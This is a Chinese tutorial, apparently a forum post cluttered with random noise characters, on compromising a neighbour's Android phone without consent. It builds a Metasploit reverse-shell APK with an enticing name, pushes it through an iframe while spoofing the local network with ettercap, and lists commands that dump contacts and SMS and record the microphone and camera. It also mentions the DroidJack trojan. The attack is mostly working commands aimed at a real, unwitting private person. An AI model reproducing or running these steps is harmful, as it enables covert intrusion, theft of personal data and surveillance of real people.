|
$ P# ]' z% r4 z0 f }3 h% @5 }" K 五、msf+ettercap入侵邻居安卓手机
s F2 k7 a2 d9 O5 O3 l0 G1 a$ j % _2 P4 X( Q% U2 u
6 x; {, Z+ E( @. f' R( h
首先启动msf * c7 P! A: f: W/ W/ g* J O2 @9 e: y
+ r2 _. S2 }' n; E; n
7 n+ d" h% ]( T: p3 ?) s5 P
先用kali生成一个安卓木马,如下命令:
' a/ C" G. S) \$ I& H 9 }: M( J% N$ K
9 j8 g. C7 @- d+ j
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
0 f- E( f) P8 J
0 J O4 q6 E! [! O
$ F0 N( b2 t+ [ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
3 K% @3 F$ h6 X* x+ W 3 Z4 C7 p: C* Y' t: G
; R( H$ K+ p( c& C( @3 @% w 然后进入msf
5 z, L6 S/ Y3 u2 O. j* a. c' g6 A & D4 H7 j" l5 u7 E! O$ f
: W% D, X0 X& S! P7 k use exploit/multi/handler
. ^# L8 S8 {7 M/ W0 w; X
$ @8 d# Y) V2 v. F, a, M% Q
- z. R9 `' }: M5 P; b. l: v+ | set payload android/meterpreter/reverse_tcp
# @& X, a2 C# \
1 f* ` q& I1 k" T8 c8 b
( P9 W+ c4 L0 W, G% g8 R set LHOST 192.168.0.109 //ip为kaili的ip
- N" D0 M5 ?& U' {( C+ D8 e5 \
2 O) U: E1 F2 ^' R# \+ F6 Z9 b9 }( U% r3 q
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
) ?. x# Z: f5 K6 J# E V& t. `2 G . F7 k/ y, D" u$ p- |& o1 [
3 Q$ z& P m+ O1 [ Exploit 4 Q0 r! F8 T* X/ [: x/ V. `* D# v
6 D) ~% }. V5 H7 ?- s
' f3 v, }( }! T6 w: ^
2 \# Y+ Y* |1 I. a$ s 1 N0 H: u B: G1 I
, y% V# Q: \6 t# |. M% T 下面我们开启ettercap -G
. w8 G0 ~+ Y# |9 F) U
9 W% P t6 {% L, ^1 X+ s9 D& L* ?: X5 ?; \! W
我物理IP为 * C8 x6 t" h; ^- u" q0 \" S- e; D
8 m$ D6 C$ x9 _
# J7 |( Q" R2 d ~" o4 h 3 G, c4 X5 B( p: X
( n& ^1 R( C: w- i: I4 R+ S$ w- a# a( s8 G2 |0 I
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 1 Y( k8 |, N: N" u+ s, V
$ [( ]! G' D& l) `0 g- O
! |% R( I7 l2 u+ o: L 下面我们来设置一下
5 p; T, m( q2 p; w" ^2 F3 A# O1 f1 D
" w" o7 I& q0 r) q9 Q0 _
1 H ?8 Q2 U _. u8 H4 m
, x% K. Z) ~5 c6 q4 Z/ Z8 i4 { 3 H U3 r# F6 g9 M, ?' F/ x% V
% x0 h" E n9 J' O3 r6 |4 ? 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ' s0 J5 e& M- r) S8 P% |
2 @* \& i6 I( A/ m5 U3 m% z m" `3 L& X: L' Y& z* T: b2 w* k0 m
& n2 f# |( y: M- q! g, y ' e0 Z; T* t! j. m% R
5 r$ Z; i1 A0 Y' p
" B% f. u: V8 i+ m( t4 y . J" g( Z2 V1 `/ ]5 ]! h( b
- d3 d4 k+ E+ ~, v V
0 G2 y8 y* Y- u" c | Y: j
8 f: c3 r& R: ?! g7 ~8 B
9 I" A' e* n& B7 W, \ 2 `" ?4 f" B: ^6 [4 f1 _
2 z$ N1 I3 z* x7 p0 W
7 w8 u4 E& g0 c
; {2 e$ |. \- G Z' ^
) E- k5 A2 Z' G! E( Q0 a/ O$ T3 F# Y
: ^5 F" u+ n/ S+ k" U/ Y! K9 w. q o / _6 G1 D5 j: m- G" H
6 ~1 I I3 r+ P! d |% g3 }
/ F/ L( L6 i" i( s0 l0 Z/ G
; x' L, c: g( ]4 R7 P
0 @2 n" s" @6 E' H- |. l& N& p! n- O $ |* \, ~2 u% ]0 e9 p6 y9 ~* K0 l9 e
* p4 ` p5 t, K. A
7 j" }8 w+ Y+ ?8 u! ^5 o s
4 p4 n2 K( g5 F7 `
* @) Y% Y3 n" `/ Q+ y, D
9 j) G6 m4 p2 @/ O+ u% p7 m0 }- f + _% b. g# ^1 ]( ?0 J0 u+ A( A# [: o
9 Y! B" ?3 ^; o: g- S- c6 q9 y
9 B. B1 O, v3 u5 v, A+ i0 h, ]
) l6 H: \; h% d% L. ^% V- h+ {
3 c6 |, P( e" R- E6 ~2 d
+ A" [1 H$ d$ e/ c3 P( D
1 Z7 \, c" i3 d# M9 T3 d; z
1 a- Z8 h/ O S6 b, K' g2 p4 S3 v3 V0 x
+ q7 A/ h" ~' \ p' u6 L8 q
% n2 l2 D- V- a7 N. Z! T/ K4 t. E( M9 A- O. n( Y6 n
下面我们开始攻击 / m8 z: y( O% r6 ]6 Y$ @3 {
" S; |, b9 j& {; Z; i+ p4 `- z6 c- A8 ^) W; V+ f
; d+ _- q( M. |" m+ E/ M# ~- @
) u. o* K( i) r2 G& M! o0 M+ _2 ?
& ?7 j9 X: l" B3 K6 H9 j G
1 N# h6 p9 H+ K9 [8 D" H" `3 o( J& v7 D n: P2 `) v
- H* s! ^9 Z7 ~, N& T& m! \
: c! E( l3 y. L, G2 i$ M
. c/ ^; P! C' _5 T
/ W6 X$ c! Y3 G+ l
; t. l6 \$ \' u- P6 O% [' Y3 {" o+ y0 s: }3 o. m/ G
9 ~1 Y: A7 i. P s" x
) G6 V* {( R& ~
' V6 _( j$ g1 w5 O; P 大概过了5分钟多,发现反弹成功了 9 C# G1 o7 j7 J! B* O2 V: K
! f7 e' L6 q' q3 f. |& e3 Y
8 j! B: I. ]' W- v$ } + J3 V: t/ P& S- S# O: i' i
% C! O5 R- t3 L# V" c& u, T
- c( n/ q8 U6 N9 `" Z* H
8 R+ L4 f! ` C% H9 Z3 W, M ; M) B1 X0 Y4 x# z% C( ~
6 L0 k- G' \$ g5 B 0 }4 T8 b2 l7 f! P' r
6 @) ~( c) T% r0 k0 y
- n/ H' t2 D2 g% ^) I: c , H& E ^( K3 t& o8 w
- f( ?) n! F1 a: a' l9 z
! ] h$ ^: h% z7 u
S, _$ Y2 r3 d9 x & D! D9 v& ?4 ~
' K! E X0 H, N! `- c, t- A
0 a$ e* `5 c: B, Z4 I+ u3 n ! \! {$ y ^0 H* J
' A! ?. G& W# T2 F% x5 e/ G $ l* D5 ?' g4 E7 d6 X6 H6 L% I! H2 d
4 {' h2 m' I$ D& A8 ^, z+ F
0 p( e7 [3 I$ Z! @3 j* L2 \ 执行命令 5 P# W6 `! Y5 J
' S$ s k4 T* N) r# i0 c* y) w
: s* K n* _! q% d0 b! R7 A
8 l4 |: ^4 }; V/ M4 u 4 r* x$ y4 c0 w3 |0 x& D
" ?0 I- k% U+ T |$ I
dump_contacts --》这个是导出电话
. r1 L% ]3 S& h/ V
( ~# C0 ^# l% ~! J; r2 M' W4 X3 N+ q$ Z, L& ?5 {9 K
dump_sms --》这个是导出信息 8 G0 ]$ F$ _6 C' E
, d6 w) J/ z3 x% Q4 D& K, K' q/ Y1 f; ?& _: e
record_mic Record audio from the default microphone for X seconds - N$ t& P- S/ _7 ~# I: j
, u9 v3 M: o. N0 y
: _9 @/ ^' |8 p% `* E0 N webcam_chat Start a video chat & G! l4 e( `7 @
% l' r) c2 ~: q% j0 A5 ^% q7 U& H! o2 c2 X! D
webcam_list List webcams 7 y$ H/ e ~, k" D. L* ^. i
" ^/ {9 S7 d1 A1 m" O- Q/ E [9 I9 P7 a( \; W2 X: W
webcam_snap Take a snapshot from the specified webcam ! j" }7 b# R3 T( N6 P
4 m& l1 C# k; q; D% f t- M* L( r* ^3 D" [& A! v
webcam_stream   lay a video stream from the specified webcam 9 m. E. |5 n! D7 b5 g% q" X
* k! Z- {& g" O& s% h) b2 t
( L, u, _2 f2 H3 j) ~8 }5 F
8 _, `$ z: L! ]6 f A# g' M ! o/ k0 _7 Z3 }' R( A
. D q4 ~5 H5 C# q6 Y }
9 D# d# ? M/ h5 `1 a " \5 K* i" Z, m6 @* I
6 b; y* w1 g; N. Y1 c/ n 我们打开看一下电话薄,
" M8 H+ s# h0 h. _! M+ f0 r# A, J
7 [- z2 y( @" L" O5 X: v, u6 ^
5 i* V& h) W$ A' L" f 5 w' V0 Q$ ~! [# O
( Y& A g Y6 \- o" H0 n
]" {$ p- y! V9 D + ?! M, Z6 c( k P& J+ M5 @
8 e; o! `/ Z; w3 E: F( `; z. {% V0 I3 N' V u9 v" u
( F: W9 X5 i$ C( T) ]' S+ [% m0 Y & y+ q, S& H1 x
( e% l8 r: X0 M& ]( W& e% M: E
1 ^* C1 i6 s/ T- U) R3 N
' s3 P: o0 f( D
' R7 i) \! B( R) D' ^9 l 3 d: y* [) y, |) S/ Z* t
% n7 w$ `/ Z. K" Q5 S" U \$ x4 W9 s6 N" p& ?9 Q( x
1 d: [- \, c; V+ l3 }6 L
4 Z# h4 m$ k i& s0 M
4 ^# }/ D& G+ K% U; b! x 我们同时欺骗成DroidJack木马,使用方法如图: 9 R! d' _" c0 a) e
7 c# M- f" U5 p0 x
$ ^6 K: f9 }( f. d- d& r+ v
6 L) Y- X: F( }; w+ V5 v
7 Z) W+ `3 T& N2 H! s
' s! n# X: g$ c9 R* M! `" y
3 k% K: B" a, p$ \
% v- @: \9 @4 x. [) X9 B/ B1 I5 u3 l1 c0 w/ r- u7 u
; M. V7 L! e8 V- d+ d
3 x7 W- Z0 E" Q8 y8 @4 [8 M g$ p& Q+ E5 H8 ?
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
% x$ `, x `# |' N% M0 |
$ t! }" H4 w" ?8 }* \* U" ~' N( V# y- y2 M4 w5 y1 |6 P
+ l4 o, L# s8 ~* I: Y* J: o. |
' |* @* c& O% Y% j2 |: G2 M3 J2 d$ @+ g" `+ ?- R" l6 J, Z
+ O" y5 m E9 j% V* g' e
. r! Y* k( X2 D: F, k
0 N( m9 v& r# p0 n% K7 e
' t- Y* s5 c, A: Q: J4 G3 B
! {: K7 Y2 b2 D# Y# ?% x" C/ C" R6 C
# [0 }9 u3 ]* w2 c( K' |, C7 w 
' B; [. x9 {- c( e
5 ~9 C* K: n$ G3 ?* C, U9 T6 \# s6 y( B' z, U Y6 r
( r: m, j" ^3 o% }+ w w1 L
|